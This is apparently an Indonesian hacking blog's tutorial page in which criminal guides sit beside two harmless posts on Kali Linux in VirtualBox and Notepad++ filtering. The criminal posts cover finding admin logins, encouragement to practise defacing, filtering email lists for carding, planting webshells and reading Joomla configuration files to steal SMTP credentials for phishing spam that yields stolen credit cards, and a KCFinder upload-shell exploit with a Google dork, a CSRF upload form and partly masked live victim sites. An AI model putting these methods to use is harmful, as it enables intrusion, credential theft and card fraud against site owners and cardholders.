Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan
Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan

Senin, 01 Agustus 2016

Cara Menemukan Admin Login Pada Website

Cara Menemukan Admin Login Pada Website

Cara Menemukan Admin Login Pada Website - Untuk menemukan admin login sebuah website memang agak agak sulit sulit gampang. Karena admin login tersebut tergantung dari cms yang digunakan contohnya seperti wordpress. Kalo wordpress pasti udah default wp login. Tetapi kendalanya adalah ketika sang admininstrator website tersebut pintar, maka halaman loginnya akan diubah. 

Maka dari itu saya rangkum 6 Cara Menemukan Admin Login Pada Website. Langsung saja no cingcong. 

1. Ketahui CMS yang dipakai ( Mudah )
Seperti yang saya telah sebutkan diatas.  Tiap tiap cms pasti mempunyai halaman login yang berbeda beda tergantung dari jenisnya. Contohnya 

  • wordpress, pasti halaman loginnya adalah wp-login.php
  • Joomla, pasti halaman loginnya adalah  /administrator
  • Popoji CMS, pasti halaman loginnya adalah po-admin
  • dll masih banyak

Maka dari itu kamu harus menguasai beberapa cms. Sering seringlah latihan deface. Agar kamu banyak pengalaman dan skillnya meningkat.

2. View-source
Teknik ini biasa saya gunakan ketika website tersebut menggunakan cms yang tidak terkenal atau cms yang tidak banyak result googlenya. Karna kita tidak tahu letak admin loginnya. Maka kita bisa gunakan view-source:website.com 

Contoh : Saya akan mencari login website http://smkghalib.sch.id/
1. view-source:smkghalib.sch.id
2. Nah, disinilah ketelitian kita diuji. Disini kita perlu insting. Kita harus melihat url yang berhubungan satu dengan lain. Dan lihat url yang ada kaitaanya dengan Admin Login
3. Saya menemukannya yaitu : site.com/appspanel diredirect ke -> /appspanel/login.php
Cara Saya menemukan :
1. Insting
2. Cari kaitannya dengan kata " admin / login / panel dll. "
Kebetulan itu terdapat kata panel, yasudah,. itulah panel loginnnya :D

Metode ini bisa digunakan pada web lain. 

3, Tools Admin Finder
Saya biasa juga menggunakan tools admin finder. Biasanya orang menggunakan tools admin finder itu tidak banyak berguna. Tapi kenyataan yang tidak berguna adalah bukan admin findernya tapi list password kamu yang sedikit. Maka dari itu carilah list password admin login yang banyak. 

Berikut contoh tools admin finder yang saya gunakan :


*Note : Pengguanaannya dan link download akan saya upload dilain artikel

4. Acunetix
Tau Acunetix ? sebenernya ini adalah bukan tools untuk scan admin login. Tapi digunakan untuk menscan kerentaanan pada sebuah website. Tapi bisa digunakan juga untuk menscan url yang terdapat pada sebuah wesbite. Maka dari itu tools ini juga berguna, 

Caranya : 
1. Newscan website terget
2. tunggu sampai selesai
3. Terus cari kata " password tipe input " lalu klik bawahnya
4. Maka akan muncul path loginnya. 
5. Nah admin lognnya adalah : site. com/login.php



5. Dork & robots
Selanjutnya adalah menggunakan dork & robots.txt
Dork
untuk menggunakan dork cukup simple yaitu kita harus dorking isi dari web target
Contoh : site:target .com + "login" 
dll. kembangin aja, kata loginnya di ganti dengan admin, panel, dll

Robots.txt
Untuk menggunakan robots.txt cukup gampang yaitu kita tinggal kasih kata robots.txt dibelakang website.
Contoh : web. com/robots.txt

6. Xenu Link
Xenu link adalah sebenernya tools untuk mengecek url yang error pada sebuah website, namun bisa digunakan juga untuk mengecek admin login pada sebuah website.
Cara penggunaan :
1. Download Xenu Link 
2. Instal dan buka 
3. kemudian scan website 
4. Nanti akan muncul link dari website yang kamu scan, 
5. Cari admin loginnya deh 




7.  Admin Finder perl / python
Ini adalah biasa yang dipakai oleh banyak orang dan " katanya " sih gak work. Tapi siapa bilang bagi lammer sih gak work tapi bagi newbie kayak saya sih work. wkwk :D 
Bahan :
Download di google 
Pengguanaan : 
*tergantung scriptnya. perl / python.

Perl : perl Cp-Finder.pl www.domain .com
Python : python x.py www. target .com

Sekian artikel tentang Cara Menemukan Admin Login Pada Website. Sebenernya sih jujur masih banyak caranya tapi karena tidak ada waktu yang cukup dan udah kepanjangan sih ya itu saja. Yang keenam diatas itu adalah biasa yang saya pakai. 

Jika kamu kebingunan atau mengalami ngandet, komen aja dibawah / hubungi page fb blog ini nanti saya bantu selow haha :D Semoga bermanfaat

3xploi7 Team

Jumat, 27 November 2015

Cara Fullscreen Kali Linux Di Virtualbox | How To Fullscreen Kali Linux in VirtualBox




Assalamualaikum Wr. Wb.

#KeyWord :
Cara Fullscreen Kali Linux Di Virtualbox 
How To Fullscreen Kali Linux on VirtualBox
How to Change Kali Linux Screen Resolution on Virtual Box
Can’t make Kali Linux run in full screen on VirtualBox

Pada kesempatan yang baik ini saya akan memberikan tutorial Fullscreen Kali Linux Di Virtualbox. Waktu itu saya juga pernah pakai ubuntu dan berhasil fullscreen, lalu saya bosan dan beralih ke Kali linux. Saya menggunakan VirtualBox sebagai medianya .. ( Males dual boot :v ) 

Nah, biar kayak asli saya ingin membuatnya menjadi fullscreen, tetapi ada beberapa masalah yang terjadi. Lalu saya mencoba metode ini dan berhasil. Karena ada niat pasti ada jalan keluar. gak usah banyak cingcong langsung aja.. 

Requirement :
- Kali linux
- VirtualBox

Steps :


1.  Install Dependensi
Buka Terminal Kali. update Package Manager dengan menjalankan Command dibawah ini 

apt-get update
apt-get upgrade -y
apt-get dist-upgrade -y

    dan Sistem akan menginstal Package Manager yang dibutuhkan.
Jika sudah selesai Install Dependensi dengan mengikuti Command dibawah ini :

apt-get install linux-headers-$(uname -r) -y

2. Mount VirtualBox Guest Additions drive
Dari menubar divitual box anda. Click Devices -> Insert Guest Additions CD Image.. blabla


3. Copy Dan Install Paket
Copy & paste " VBoxLinuxAdditions.run " 


cp /media/cdrom/VBoxLinuxAdditions.run /root/Desktop/
cd /root/Desktop/

Buat menjadi executable:

chmod 755 /root/VBoxLinuxAdditions.run
Lalu Install :

./VBoxLinuxAdditions.run
*Note : Jika Muncul gambar dibawah seperti ini berarti anda berhasil 


Jika Berhasil. Reboot / restart lah virtual box anda .


Rabu, 11 November 2015

Filter Email Dengan Notepad++


Keyword:
Cara Filter email dengan Notepad++
Tutorial Saring Email dengan Notepad++
Tutorial Pisah email dengan notepad++
Cara Saring Email dengan notepad++
Cara Pisah Email dengan Notepad++
__

 Assalamualaikum Wr Wb

Kali ini saya akan memberi tutorial bagaimana cara memfilter email dengan notepad++ . Mungkin tutorial ini sangat berguna sekali untuk para pencari angka 16 digit . Ceritanya saya akan mefilter Yahoo ..  oke langsung saja berikut ini .

[#]Bahan

  • Mailist 
  • Notapad++
[#]Tutorial 

1. Buka Mailist kamu dengan Notepad ++
2. Lalu klik CTRL+F lalu pindahkan ke-tab "Mark" ( ikuti gambar dibawah ) 




3. Centang Bookmark line , lalu isi kan pada kolom Find What  contoh : "@yahoo.com" lalu klik Mark All lalu Close



4. Setelah itu pada menu Search > Bookmark > Copy Bookmarked Line 


5. Setelah itu CTRL + N / New dan tinggal Paste !


Nahh .. udah kefilter kan yahoonya .. ye.. ^_~




Senin, 02 November 2015

Trik Cepat Mendapat Result CC 300 Perhari




Assalamualaikum Wr. Wb.



*Warning 

Jika kalian sudah master atau males baca. mendingan close page ini aja. buat yang mau sukses trik ini baca secara detail dan cermat. Kesuksesan butuh perjuangan Boss !

---------------------------------------------------------------------------------------------------------------

Kali ini saya akan berbagi trik mendapat result cc 300 perhari. Trik ini discovered oleh Wyatt Gillete ( alecs ) biasanya yang paling inti dalam permainan spam itu adalah SMTP bisa dibilang senjata utama, karena tanpa ini kita tidak bisa mendistribusi *Aseek letter kita.

 nah sekarang aku ingin memberi method yang simple tapi agak anu yaitu cari smtp yang bagus (cara lain dari exploit zimbra). Untuk itu kalian menggunakan method web defacing apapun methodnya, yang terpenting kalian bisa menanam biji shell dan menghasilkan sebuah webshell :v, 

Nah disini, tergantung ke hokian kalian juga. kalo kalian hoki webshell mu akan ada domain symlinknya. kemudian kalian bermain dengan si symlink atau bypass symlink untuk mencari file config / konfigurasi  web (misal cms joomla). Di configuration.php joomla terdapat konfig SMTP server di dalamnya ( biasanya ada dan ada juga yang tidak ada ). biasanya yang bagus itu web corporate atau yang ber Secure Socket Layer / SSL (minimal).

Selain dari hoki hokian tadi selain symlink kalian juga bisa menggunakan salah satu 3xploit Joomla misalnya Component User / Com_user dan lain lain. Jika kalian berhasil menganu kalian bisa lihat di configuration.php dan lihat User password Smtpnya Seperti berikut :




untuk mempermudah langkah kalian di permainan Symlink Sebelumnya , aku kasih alat bantu yaitu php config grab. gunanya untuk grab seluruh file konfigurasi dari masing2 konten web di dalam satu server. cara tinggal upload aja file nya kemudian akses seperti biasa kemudian tunggu sampai proses selesai. 

Silahkan Download Scriptnya Dimari 


Sabtu, 31 Oktober 2015

KCFinder Upload Shell Vulnerability



#-  Exploit Title : KCFinder Upload Shell Vulnerability
#- Exploit Author : Iranian_Dark_Coders_Team
#- Google Dork : inurl:/kcfinder/browse.php
#- Date : 24/04/2014
#- Home : www.idc-team. net
#- Discovered By : Black.Hack3r
#- Vendor Homepage : kcfinder.sunhater. com
#- Version : 2.51 - 2.53
#- Tested on : Windows 8 & Linux

=================================================

 [+] Events location bug:

 [+] http://127.0.0.1/path/kcfinder/config.php

  Line 51: 'deniedExts' => "exe com msi bat php phps phtml php3 php4 cgi pl",



 [+] Exploit:
 
 [+] http://
127.0.0.1/kcfinder/browse.php
 [+] http://
127.0.0.1/[path]/kcfinder/browse.php



 [+] Proof Of Cencept

Trick 1 ~~
 
1 > Go to target link
    http://
localhost/KCFinder/browse.php

2 > Then select your folder from the left panel

3 > Upload your shell as [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & defacepage.html ]

4 > Shell Acces ?
      {here}
       

Trick 2 ~~

Where is vulnerability ? "localhost/path/kcfinder/upload.php"

How to ??  You can use CSRF :) 

<form method="POST" action="http://web. com/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ ndsxf</button>
</form> 

Shell Acces ? {here}

 [+] Demo site:

 [+] http://www.basukiwat**.com/assets/js/mylibs/kcfinder/browse.php
 [+] http://www.padel4**.be/kcfinder/browse.php
 [+] http://goyathlaysvintagepavonirestoratio**.com/kcfinder/browse.php



 [+] Discovered By : Black.Hack3r
 [+] We Are : M.R.S.CO,Black.Hack3r,N3O,D$@d_M@n,KurD_HaCK3R,HOt0N
 [+] SpTnx  : Sec4ever,HashoR,@3is,Security,M4H4N,Mr.Cicili And All IDC Member
 [+] Home : www.idc-team. net